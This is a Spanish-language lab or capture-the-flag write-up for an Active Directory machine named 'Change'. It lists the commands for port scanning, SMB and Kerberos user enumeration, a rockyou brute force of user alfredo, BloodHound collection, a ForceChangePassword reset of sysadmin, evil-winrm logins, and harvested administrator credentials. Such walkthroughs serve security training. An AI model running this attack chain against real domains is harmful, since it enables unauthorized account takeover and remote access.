# Change

### 🔍 **RECONOCIMIENTO**

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 192.168.1.54
```

para verificar la conectividad de red.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FKqW8ShswzOrI8XUQ4Vzz%2FCaptura%20de%20pantalla%202025-07-20%20173556.png?alt=media&#x26;token=7cd455b4-8b7e-4491-bc65-f566cc72516a" alt=""><figcaption></figcaption></figure>

A continuación, se realiza el comando:

```bash
nmap -sVC -p- -n --min-rate 5000 192.168.1.54
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FGVroLNWiubtOqDshxLsJ%2FCaptura%20de%20pantalla%202025-07-20%20173942.png?alt=media&#x26;token=f60d042c-548f-4ac7-b48a-aa2dc681bdf8" alt=""><figcaption></figcaption></figure>

Durante el escaneo, se identificaron múltiples puertos abiertos relacionados con **servicios típicos de Active Directory en un entorno Windows Server**. A continuación, se detalla cada uno:

| Puerto          | Servicio                 | Descripción                                                                   | Relevancia en Pentesting                                                        |
| --------------- | ------------------------ | ----------------------------------------------------------------------------- | ------------------------------------------------------------------------------- |
| **53**          | DNS (Simple DNS Plus)    | Servicio de resolución de nombres. Fundamental para la operación del dominio. | Enumeración de zonas, DNS spoofing, análisis de transferencias (`dig axfr`).    |
| **88**          | Kerberos                 | Protocolo de autenticación utilizado por AD.                                  | Objetivo de ataques como Kerberoasting, Pass-the-Ticket, Golden Ticket.         |
| **135**         | MS RPC                   | Microsoft RPC endpoint mapper.                                                | Comunicación entre servicios. Puede facilitar enumeración vía `rpcclient`.      |
| **139**         | NetBIOS-SSN              | Servicio para compartir archivos e impresoras (NetBIOS).                      | Usado con `smbclient`, `enum4linux-ng`, `smbmap`.                               |
| **389**         | LDAP                     | Protocolo para acceder al directorio (modo sin cifrar).                       | Enumeración de usuarios, grupos, SPNs, flags UAC. Clave en enumeración AD.      |
| **445**         | SMB (Microsoft-DS)       | Compartición de archivos en Windows.                                          | Dump de hashes, movimiento lateral (SMBexec, Psexec), enumeración sin creds.    |
| **464**         | kpasswd5                 | Servicio para cambio de contraseñas vía Kerberos.                             | Interesante para ataques como *krbrelayx* o abuso de cuentas.                   |
| **593**         | RPC over HTTP            | Comunicación RPC encapsulada en HTTP.                                         | Utilizado por Exchange, Outlook y otras apps. A veces base de ataques internos. |
| **636**         | LDAPS (tcpwrapped)       | LDAP sobre SSL/TLS.                                                           | Enumeración segura del directorio, aunque a menudo filtrado o cifrado.          |
| **3268**        | Global Catalog (LDAP)    | Puerto usado para consultas a todo el bosque AD.                              | Ideal para enumerar objetos de todo el dominio.                                 |
| **3269**        | GC over SSL (tcpwrapped) | Versión segura del Global Catalog.                                            | Misma funcionalidad que el 3268, pero cifrado.                                  |
| **5985**        | WinRM (HTTP)             | Windows Remote Management.                                                    | Punto de entrada para `evil-winrm`. Fundamental para ejecución remota.          |
| **9389**        | .NET Message Framing     | Servicio para autenticación de AD Web Services (ADWS).                        | Utilizado por PowerShell Remoting, BloodHound, etc.                             |
| **47001**       | HTTPAPI                  | Servicio adicional HTTP, generalmente WinRM.                                  | Usado por PowerShell Remoting.                                                  |
| **49664–49714** | MS RPC dinámicos         | Puertos de comunicación RPC asignados dinámicamente.                          | Relevantes para movimiento lateral, enumeración y abuso de servicios remotos.   |

### 🔎 **EXPLORACIÓN**

Tras el escaneo, hacemos una enumeración **SMB**.

```
nxc smb 192.168.1.54
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F7JKMogIl8JMzFzwgdjOu%2Fimage.png?alt=media&#x26;token=fe8a7558-4335-47bb-ae86-114053b99560" alt=""><figcaption></figcaption></figure>

Tenemos un dominio que añadimos al fichero `/etc/hosts`. Miramos los recursos compartidos.

```
nxc smb 192.168.1.54 --shares -u '' -p ''
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FVDYmvulfdlOOgfRBolNO%2Fimage.png?alt=media&#x26;token=7e50af38-e4d6-40a5-b610-2d00111c3868" alt=""><figcaption></figcaption></figure>

```
smbmap --no-banner -H 192.168.1.54 -u '' -p ''
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FeBeLVTE5sw0ofS5KV4mL%2Fimage.png?alt=media&#x26;token=91fafbe0-f7d7-480f-8537-7cfe437877ee" alt=""><figcaption></figcaption></figure>

### 🚀 **EXPLOTACIÓN**

Tras no encontrar nada, intentamos sacar usuarios a través del dominio.

```
./kerbrute userenum -d megachange.nyx --dc 192.168.1.54 /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FJM51gNqkhMn1sdc0uSlJ%2Fimage.png?alt=media&#x26;token=153f50d3-4621-48a6-8e83-5d35b077391d" alt=""><figcaption></figcaption></figure>

Realizamos fuerza bruta al usuario **alfredo**.

```
nxc smb 192.168.1.54 -u 'alfredo' -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FA4NLo4MAYYAiubd8HLtj%2Fimage.png?alt=media&#x26;token=a5412a53-f472-4b61-bd95-f86a170d3825" alt=""><figcaption></figcaption></figure>

A través de **Bloodhound** investigamos el dominio.

```
bloodhound-python -u 'alfredo' -p 'Password1' -ns 192.168.1.54 -d megachange.nyx -c All --zip
```

Subimos el Zip y analizamos.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fc8WicQTpDVtmd2OFxS4D%2Fimage.png?alt=media&#x26;token=d61ea9b1-caf9-4af4-8f65-e03d5df34039" alt=""><figcaption></figcaption></figure>

**Alfredo** tiene capacidad de **ForceChangePassword** sobre **SysAdmin**. Significa que puede usar **net** para cambiar la contraseña del usuario **SysAdmin**.

```
net rpc password sysadmin 'Hola123' -U "megachange.nyx/alfredo%Password1" -S 192.168.1.54
```

Validamos el cambio por **SMB**.

```
netexec smb 192.168.1.54 -u 'sysadmin' -p 'Hola123'
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FKNwIFkfZaTZtNiBRp6sf%2Fimage.png?alt=media&#x26;token=7c8a9cff-8dab-4fb4-86f8-ec8b14d945ae" alt=""><figcaption></figcaption></figure>

Validamos el cambio por **WINRM**.

```
netexec winrm 192.168.1.54 -u 'sysadmin' -p 'Hola123'
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FTtMS2xgBnmxmmKa6U7wn%2Fimage.png?alt=media&#x26;token=418cda71-d456-48b6-8078-901a2ae68370" alt=""><figcaption></figcaption></figure>

Sabiendo eso nos conectamos.

```
evil-winrm -i 192.168.1.54 -u 'sysadmin' -p 'Hola123'
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FzTf6lv1ADRPFTDMQvu2Z%2Fimage.png?alt=media&#x26;token=6987edf7-8871-445c-9194-f40e98f4da9c" alt=""><figcaption></figcaption></figure>

### 🔐 PRIVILEGIOS

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Ft9X9NbKrzlTyeFDZYmxa%2Fimage.png?alt=media&#x26;token=80246ea2-6b50-4b9b-9f07-0c6ecd576b00" alt=""><figcaption></figcaption></figure>

Subimos **winPEASx64.exe** y ejecutamo&#x73;**.**

{% @github-files/github-code-block url="<https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS>" %}

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F6PWnYvvQvvzPUMQXQrW8%2Fimage.png?alt=media&#x26;token=3a2d5661-e78c-4389-8882-33104ac8212d" alt=""><figcaption></figcaption></figure>

Habiendo obtenido estas credenciales las validamos como anteriormente.

```
netexec smb 192.168.1.54 -u 'administrator' -p 'd0m@in_c0ntr0ll3r'
netexec winrm 192.168.1.54 -u 'administrator' -p 'd0m@in_c0ntr0ll3r'
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FS3C45KTFFrdVmuWPt5gB%2Fimage.png?alt=media&#x26;token=f82e4d9b-ec8a-41fb-8485-1fdaf3c59c4f" alt=""><figcaption></figcaption></figure>

Esto significa que nos podemos conectar como **Administrator**.

```
evil-winrm -i 192.168.1.54 -u 'administrator' -p 'd0m@in_c0ntr0ll3r'
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FKcUY76KyzH6aJ802ktD6%2Fimage.png?alt=media&#x26;token=f12ac22d-cf9a-47e9-8c43-e48a18334a92" alt=""><figcaption></figcaption></figure>

Ya podemos obtener las **flags**.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FuIPqJY3Gmc8Pqj1WgsxY%2Fimage.png?alt=media&#x26;token=e54a95b6-e99c-411f-9285-6a39452de0b6" alt=""><figcaption></figcaption></figure>

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FRInCEl5A8Chhd1tSTqkj%2Fimage.png?alt=media&#x26;token=efbce3ad-b482-41b8-9023-86ad17249e44" alt=""><figcaption></figcaption></figure>
